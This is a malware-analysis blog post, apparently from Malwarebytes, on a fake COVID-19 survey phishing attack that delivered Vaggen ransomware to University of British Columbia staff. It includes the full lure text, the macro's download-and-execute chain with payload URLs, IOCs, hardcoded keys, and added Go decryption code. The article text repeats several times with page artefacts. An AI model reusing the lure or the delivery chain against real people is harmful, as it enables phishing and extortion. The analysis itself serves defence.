with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell function to see whether it was successful (the return value would be the task ID of the executed application)\r\nIf successful, it sends an HTTP GET request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends an HTTP GET request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir\r\nmain_ELDBJORT -\u003e main_encryptFile\r\nmain_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Go library function path/filepath.Walk.\r\nFiles are encrypted with AES-256 (32-byte key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the gcm.Seal function.

The content of the output file (with .VAGGEN extension) contains:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key "du_tar_mitt_hjart_mina_pengarna0" found inside the malware code is Swedish for "you take my heart my money". Using this key, we can easily decrypt the content: because the key is hardcoded in the binary rather than generated per victim, every file encrypted by this sample can be decrypted with it, and the GCM tag check confirms that the right key was used.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It's unclear at this point if the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs (file hashes are SHA-256)

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
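The file layout described above for Vaggen (a 12-byte nonce, then the ciphertext, then the 16-byte GCM tag, under AES-256 with the hardcoded key) is enough to write a recovery tool. The Go program below is an added example, not the post's code and not the malware's: DecryptVaggen parses that layout and lets gcm.Open verify the tag, so a wrong key or a damaged file is reported instead of producing garbage. EncryptVaggen exists only to build a sample blob offline (crypto/rand stands in for CryptGenRandom), and RecoverFile and RestoreName are assumed helper names for the on-disk case; the sample plaintext is constructed.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"os"
	"strings"
)

// vaggenKey is the 32-byte key the post reports as hardcoded in the sample;
// a 32-byte key makes aes.NewCipher select AES-256.
var vaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

const (
	nonceSize = 12        // standard GCM nonce; the sample fills it from CryptGenRandom
	vaggenExt = ".VAGGEN" // extension the ransomware appends to each encrypted file
)

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key) // rejects any key that is not 16, 24 or 32 bytes
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// EncryptVaggen reproduces the layout the post describes, purely to construct a
// test blob offline: gcm.Seal(nonce, nonce, pt, nil) appends ciphertext and the
// 16-byte tag to the nonce, giving nonce || ciphertext || tag in one buffer.
func EncryptVaggen(key, plaintext []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil { // stands in for CryptGenRandom
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// DecryptVaggen recovers one .VAGGEN blob. The first 12 bytes are the nonce;
// the rest is ciphertext followed by the tag, which gcm.Open verifies, so a
// wrong key or a damaged file yields an error instead of silent garbage.
func DecryptVaggen(key, blob []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	if len(blob) < nonceSize+gcm.Overhead() {
		return nil, errors.New("blob shorter than nonce + GCM tag")
	}
	return gcm.Open(nil, blob[:nonceSize], blob[nonceSize:], nil)
}

// RestoreName strips the ransomware's extension to get the original file name.
func RestoreName(encrypted string) string {
	return strings.TrimSuffix(encrypted, vaggenExt)
}

// RecoverFile decrypts one file on disk and writes the original beside it,
// leaving the .VAGGEN copy untouched until the operator has checked the result.
func RecoverFile(encryptedPath string) error {
	blob, err := os.ReadFile(encryptedPath)
	if err != nil {
		return err
	}
	pt, err := DecryptVaggen(vaggenKey, blob)
	if err != nil {
		return fmt.Errorf("%s: %w", encryptedPath, err)
	}
	return os.WriteFile(RestoreName(encryptedPath), pt, 0o600)
}

func main() {
	pt := []byte("constructed sample document contents") // constructed, not a victim file
	blob, err := EncryptVaggen(vaggenKey, pt)
	if err != nil {
		panic(err)
	}
	got, err := DecryptVaggen(vaggenKey, blob)
	fmt.Printf("recovered %q (err=%v); layout %d + %d + 16 bytes\n",
		got, err, nonceSize, len(blob)-nonceSize-16)
	_, err = DecryptVaggen(bytes.Repeat([]byte{0}, 32), blob)
	fmt.Println("wrong key:", err) // tag check fails instead of returning junk
}
```

Because the tag is authenticated, the decryptor doubles as a key check: if a sample from one of the other variants turns out to carry a different hardcoded key, gcm.Open fails rather than writing junk next to the .VAGGEN copy, which is why RecoverFile never deletes the encrypted original.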
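The string protection described above for Vaggen (Base64, then XXTEA under the hardcoded key "STALKER") can be undone with a small amount of code. The Go program below is an added example rather than the post's code or the xxtea-go library's: it implements the reference XXTEA passes and assumes xxtea-go's framing, namely that the key is zero-padded to 16 bytes, that data is handled as little-endian 32-bit words, and that a trailing word carries the plaintext length. The sample string is constructed; the real ransom-note ciphertext is not reproduced on the page, and EncryptString exists only to build that sample.

```go
package main

import (
	"encoding/base64"
	"encoding/binary"
	"fmt"
)

const delta uint32 = 0x9e3779b9

// fixKey zero-pads the key to the 16 bytes XXTEA needs and splits it into four
// little-endian words; that padding is what lets the 7-byte "STALKER" work at
// all (xxtea-go's fixk does the same; assumed library framing, see lead-in).
func fixKey(key []byte) (k [4]uint32) {
	var b [16]byte
	copy(b[:], key)
	for i := range k {
		k[i] = binary.LittleEndian.Uint32(b[i*4:])
	}
	return k
}

// mx is the XXTEA mixing function; bteaEncrypt/bteaDecrypt are the reference
// Wheeler-Needham passes, in place, and the callers guarantee at least two words.
func mx(sum, y, z, p, e uint32, k [4]uint32) uint32 {
	return ((z>>5 ^ y<<2) + (y>>3 ^ z<<4)) ^ ((sum ^ y) + (k[(p&3)^e] ^ z))
}
func bteaEncrypt(v []uint32, k [4]uint32) {
	n := uint32(len(v))
	var sum uint32
	z := v[n-1]
	for rounds := 6 + 52/n; rounds > 0; rounds-- {
		sum += delta
		e := (sum >> 2) & 3
		var p uint32
		for p = 0; p < n-1; p++ {
			v[p] += mx(sum, v[p+1], z, p, e, k)
			z = v[p]
		}
		v[n-1] += mx(sum, v[0], z, p, e, k)
		z = v[n-1]
	}
}
func bteaDecrypt(v []uint32, k [4]uint32) {
	n := uint32(len(v))
	rounds := 6 + 52/n
	sum := rounds * delta
	y := v[0]
	for ; rounds > 0; rounds-- {
		e := (sum >> 2) & 3
		var p uint32
		for p = n - 1; p > 0; p-- {
			v[p] -= mx(sum, y, v[p-1], p, e, k)
			y = v[p]
		}
		v[0] -= mx(sum, y, v[n-1], p, e, k)
		y = v[0]
		sum -= delta
	}
}

// pack/unpack convert between bytes and little-endian words (zero padded).
func pack(b []byte) []uint32 {
	v := make([]uint32, (len(b)+3)/4)
	for i, c := range b {
		v[i/4] |= uint32(c) << (8 * uint(i%4))
	}
	return v
}
func unpack(v []uint32) []byte {
	out := make([]byte, len(v)*4)
	for i, w := range v {
		binary.LittleEndian.PutUint32(out[i*4:], w)
	}
	return out
}

// DecryptString reverses the protection described in the post: Base64-decode,
// XXTEA-decrypt, then use the trailing length word (xxtea-go's framing,
// assumed) to cut the plaintext. That word is also the only check a wrong key trips.
func DecryptString(b64 string, key []byte) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return nil, err
	}
	if len(raw) < 8 || len(raw)%4 != 0 {
		return nil, fmt.Errorf("%d ciphertext bytes is not >= 2 whole words", len(raw))
	}
	v := pack(raw)
	bteaDecrypt(v, fixKey(key))
	m, data := int(v[len(v)-1]), len(raw)-4
	if m < data-3 || m > data {
		return nil, fmt.Errorf("length word %d does not fit %d data bytes (wrong key?)", m, data)
	}
	return unpack(v)[:m], nil
}

// EncryptString is the forward direction, used only to build a sample blob offline.
func EncryptString(plain, key []byte) string {
	if len(plain) == 0 {
		return ""
	}
	v := append(pack(plain), uint32(len(plain))) // trailing length word
	bteaEncrypt(v, fixKey(key))
	return base64.StdEncoding.EncodeToString(unpack(v))
}
```

In practice one feeds DecryptString each Base64 chunk pulled from the binary's string table; a chunk that fails the length-word check was either not produced with this key or is not an XXTEA blob at all.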
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2500 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2501 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2502 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2503 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2504 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2505 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2506 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2507 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2508 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2509 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2510 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2511 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2512 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2513 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2514 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2515 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early 